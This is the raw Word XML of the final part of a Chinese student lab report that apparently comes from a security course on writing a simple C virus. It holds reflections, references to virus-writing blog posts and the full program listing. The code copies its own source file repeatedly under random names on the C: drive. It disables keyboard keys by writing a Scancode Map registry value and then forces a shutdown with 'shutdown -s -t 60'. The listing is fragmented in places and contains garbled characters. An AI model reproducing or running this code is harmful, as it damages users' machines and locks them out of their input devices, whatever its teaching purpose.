        <w:t>次，开发者可以根据需要自己定义复制的次数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C24DF53" w14:textId="02720C38" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52C0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc42471959"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A760B0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心得</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="787FA348" w14:textId="5570DE09" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52C0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次实验</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前搜索了很多资料，也在</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:t>ithub</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>google</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上进行了查找，可能是我搜索的方式不对，最后还是在中文社区找到了很多示例，有了很多新的认识。在这次实验里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我理解了病毒复制的基本原理，</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与文件操作很类似。除此之外，我在实验中了解了一些基本的</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，了解到了键盘映射的原理。第一次了解到对注册表的操作，也让我认识到</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defender</w:t>
      </w:r>
      <w:r w:rsidR="007C704E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问什么有时候会提示有程序在修改注册表，有时候这是很严重的事情，需要引起我们的注意，在未来做安全防护的时候有所关注。我觉得如果想要文件开机自启动运行，也可以用修改注册表的方法实现，希望以后能有所尝试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077A511" w14:textId="6124EF0B" w:rsidR="007C704E" w:rsidRDefault="007C704E" w:rsidP="007C704E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc42471960"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>参考资料</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1E82E38B" w14:textId="13E378E1" w:rsidR="007C704E" w:rsidRDefault="00A80A91" w:rsidP="007C704E">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>Scancode Map</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>的妙用</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>,</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>按键随意变换！</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E990FB4" w14:textId="18D84D74" w:rsidR="007C704E" w:rsidRDefault="00A80A91" w:rsidP="007C704E">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>C</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>语言的</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>system</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>（）函数详解</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="735A6D97" w14:textId="7E9E5B60" w:rsidR="007C704E" w:rsidRDefault="00A80A91" w:rsidP="007C704E">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>C</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>语言编写简易病毒</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43F4D4EA" w14:textId="7C113006" w:rsidR="007C704E" w:rsidRDefault="00A80A91" w:rsidP="007C704E">
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>一段简单的</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>C/C++</w:t>
        </w:r>
        <w:r w:rsidR="007C704E" w:rsidRPr="007C704E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>病毒源程序</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67D08FA4" w14:textId="4B565A0F" w:rsidR="007C704E" w:rsidRDefault="007C704E" w:rsidP="007C704E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc42471961"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>完整代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6E51E8E1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_CRT_SECURE_NO_WARNINGS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5FFAFF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.h&gt;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2CE660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8EAD45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lib.h&gt;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99F2FA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ring.h&gt;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B4286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time.h&gt;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04097D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windows.h&gt;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ECCF29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copy infile to outfile */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D42E0F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pyfile(){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F7F14F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704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random name module*/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F120D6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704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_str[100] =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85BA56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704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;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4A542D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rand((unsigned)time(NULL));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C2181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ame = rand() % 1024;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE45EE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_itoa(name, name_str, 16);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD7CDF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704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self-replicated module*/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AC66CD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7C704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in = NULL, * out = NULL;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0C6FA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704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le[50] =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:\\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0E2C00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cat(file, name_str);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BAEB45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cat(file,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cpp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E085CA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 = fopen(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pf.cpp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+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797A69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 = fopen(file,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59FACB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704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feof(in)){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6FFC1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putc(fgetc(in), out);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE904B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8B2466B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close(in);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44410C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close(out);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278062D2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35BD6B4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kboardforbidden*/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4864A5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gKeyBoardForbidden()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A030D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3640654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704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HKEY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key;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53A10E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704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cancodemap[] =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0\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x00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65613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0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30F564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1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42B2AE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2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CD7D46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3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4BCBE2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4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D974B1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5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5E911B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6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F17461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7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0A703A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8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802362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9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DA36EC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E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79FEC8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1F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303305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20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222407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21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CCF8E1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22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4D5DD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23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3D3828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24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A02B34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25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A6271B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26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372003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2C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D3C777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2D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97F8CC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2E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30786A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2F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8826DD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30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47DA82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31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966832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2\x00\x32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281E22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x00\x00\x00\x0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18BB44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CreateKey(HKEY_LOCAL_MACHINE,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\\CurrentControlSet\\Control\\Keyboard Layout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hkey);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D51364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SetValueEx(hkey, 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cancode Map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0, REG_BINARY, (</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704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BYTE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scancodemap, 120);</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704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scancodemap</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>���</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704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鳤</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704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Ϊ120</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704E">
        <w:rPr>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ֽ</w:t>
      </w:r>
      <w:r w:rsidRPr="007C704E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>�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55CE8D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CloseKey(hkey);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1CE4B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AB3C944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14:paraId="5E3D347B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KeyBoardForbidden();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D133968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leep(3000);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E4C1C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704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;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A956F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704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0; i &lt; 15; i++) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24136CD6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pyfile();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18431959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leep(1000);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130295F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B00AA4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hutdown -s -t 60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94E2FB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7C704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r computer will be shut down in 60s."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D4BA3C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704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24F95DCD" w14:textId="77777777" w:rsidR="007C704E" w:rsidRPr="007C704E" w:rsidRDefault="007C704E" w:rsidP="007C704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opLinePunct w:val="0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704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AC9C8E4" w14:textId="77777777" w:rsidR="007C704E" w:rsidRPr="007C704E" w:rsidRDefault="007C704E" w:rsidP="007C704E"/>
    <w:p w14:paraId="0E40846C" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="007C704E" w:rsidRDefault="006C52C0" w:rsidP="006C52C0"/>
    <w:sectPr w:rsidR="006C52C0" w:rsidRPr="007C70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0BA22" w14:textId="77777777" w:rsidR="00A80A91" w:rsidRDefault="00A80A91" w:rsidP="0059627E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="10987BBD" w14:textId="77777777" w:rsidR="00A80A91" w:rsidRDefault="00A80A91" w:rsidP="0059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35251" w14:textId="77777777" w:rsidR="00A80A91" w:rsidRDefault="00A80A91" w:rsidP="0059627E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="286594B6" w14:textId="77777777" w:rsidR="00A80A91" w:rsidRDefault="00A80A91" w:rsidP="0059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30A03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69F4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D27FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40E4CB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5992219"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F72D8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704772C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F1A4844"/>
    <w:lvl w:ilvl="0" w:tplc="2B408B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735271"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26307ACC"/>
    <w:lvl w:ilvl="0" w:tplc="E1065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A03D2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07DC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6E411A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CB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D1455"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A660405E"/>
    <w:lvl w:ilvl="0" w:tplc="39029592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0C1771"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21700E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71022C25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8792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61344"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0A430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203"/>
    <w:rsid w:val="000F05E6"/>
    <w:rsid w:val="001D1CEA"/>
    <w:rsid w:val="0020121C"/>
    <w:rsid w:val="00254415"/>
    <w:rsid w:val="004A1203"/>
    <w:rsid w:val="0053174E"/>
    <w:rsid w:val="00556F40"/>
    <w:rsid w:val="0059627E"/>
    <w:rsid w:val="005C26AF"/>
    <w:rsid w:val="006C52C0"/>
    <w:rsid w:val="007C704E"/>
    <w:rsid w:val="00A304F4"/>
    <w:rsid w:val="00A760B0"/>
    <w:rsid w:val="00A80A91"/>
    <w:rsid w:val="00B442F4"/>
    <w:rsid w:val="00B54892"/>
    <w:rsid w:val="00B574E2"/>
    <w:rsid w:val="00C17A7F"/>
    <w:rsid w:val="00C94B44"/>
    <w:rsid w:val="00DA6D93"/>
    <w:rsid w:val="00E171BC"/>
    <w:rsid w:val="00E7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C0740"/>
  <w15:docId w15:val="{68066AAB-2A53-44D7-B5E1-020F31FC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03"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:topLinePunct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5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05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05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203"/>
    <w:rPr>
      <w:color w:val="0000FF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qFormat/>
    <w:rsid w:val="004A1203"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="341"/>
        <w:tab w:val="right" w:leader="middleDot" w:pos="9080"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004A1203"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="454"/>
        <w:tab w:val="right" w:leader="middleDot" w:pos="9080"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00596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9627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96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9627E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F05E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F05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05E6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F05E6"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="alt">
    <w:name w:val="alt"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00A304F4"/>
    <w:pPr>
      <w:widowControl/>
      <w:topLinePunct w:val="0"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basedOn w:val="a0"/>
    <w:rsid w:val="00A304F4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A304F4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="datatypes">
    <w:name w:val="datatypes"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A304F4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A304F4"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C704E"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="preprocessor">
    <w:name w:val="preprocessor"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007C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297">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="150"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="12" w:space="8" w:color="EFEFEF"/>
            <w:left w:val="single" w:sz="12" w:space="31" w:color="EFEFEF"/>
            <w:bottom w:val="single" w:sz="12" w:space="4" w:color="EFEFEF"/>
            <w:right w:val="single" w:sz="12" w:space="31" w:color="EFEFEF"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2034262248">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="150"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="12" w:space="8" w:color="EFEFEF"/>
            <w:left w:val="single" w:sz="12" w:space="31" w:color="EFEFEF"/>
            <w:bottom w:val="single" w:sz="12" w:space="4" w:color="EFEFEF"/>
            <w:right w:val="single" w:sz="12" w:space="31" w:color="EFEFEF"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1583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../Documents/Tencent%20Files/861218785/Image/C2C/0M)CRSIV21Q%5bIZU_2DX4B66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log.csdn.net/mycaibo/article/details/60599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hbhgyu/article/details/77775926?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-7.nonecase&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-7.nonec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Documents/Tencent%20Files/861218785/Image/C2C/%7bGKF~S%7b%7dWBOA4IRXL@0KP%7b8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dark_cy/article/details/89715625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../Documents/Tencent%20Files/861218785/Image/C2C/)$%7bROZS~%60UNDE_%60YQWPOF5J.png" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/findumars/p/5037815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243B-EF06-43AA-9533-188E23E0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289</Words>
  <Characters>7349</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>61</Lines>
  <Paragraphs>17</Paragraphs>
  <ScaleCrop>false</ScaleCrop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ls</dc:creator>
  <cp:lastModifiedBy>Lenovo</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-22T07:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-18T16:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>